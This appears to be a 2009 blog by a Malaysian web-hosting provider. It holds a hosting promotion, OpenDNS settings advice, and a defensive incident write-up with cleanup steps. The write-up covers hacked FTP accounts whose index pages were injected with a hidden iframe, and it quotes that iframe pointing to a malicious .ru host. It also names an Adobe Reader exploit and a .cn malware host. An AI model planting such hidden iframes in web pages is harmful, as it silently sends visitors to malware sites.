November 18, 2009
feel free to surf my new photoshoot gallery at http://matnet.my 
July 24, 2009
As Salam to all,
New Promotion:
5 GB space
60GB Bandwidth
Park/Addon Domain allowed
Unlimited MYSQL, email, ftp , subdomain
CPANEL control panel
Fantastico.
+ FREE domain .com.my net.my org.my
Interested buzz YM matnet80
July 15, 2009
Last 2 weeks i got 2 issue regarding this matters.
The scenario:
All index* was edited and redirect to malicious web using iframe.
Example:
iframe src="http://u9k.ru:8080/index.php" width=151 height=125 style="visibility: hidden">
After investigation:
1. File owner is current users not nobody or others.
2. Files uploaded by the users with right access authentication.
3. All index* was edited in the users www
4. Only current users infected.
How:
The FTP passwd was hacked.
There are 2 reason how the passwd was hacked.
1. Adobe Acrobat Vulnerability
I checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“.
If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.
This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151).
quote from - http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
2. FileZilla Vulnerability.
How to clean up :
1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
6. If your site was flagged by Google, request a malware review via Webmaster Tools.
7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.
8. Regularly update third party software in your PC.
April 13, 2009
April 6, 2009
Celcom broadband doesn't work well with Streamyx DNS servers even though both are owned by TM.
Not only that my dedi server(IDC owned by TM) also not recognize by celcom broadband dns.
To all my customer that using celcom broadband please use this DNS settings.
208.67.222.222 and 208.67.220.220
Click below for details instruction
1. XP - https://www.opendns.com/start/device/windows-xp
2. Vista - https://www.opendns.com/start/device/windows-vista
3. 2000/NT - https://www.opendns.com/start/device/windows-2000_windows_NT
4. Ubuntu - https://www.opendns.com/start/device/ubuntu
5. Nokia S60 - https://www.opendns.com/start/device/nokia-s60
|
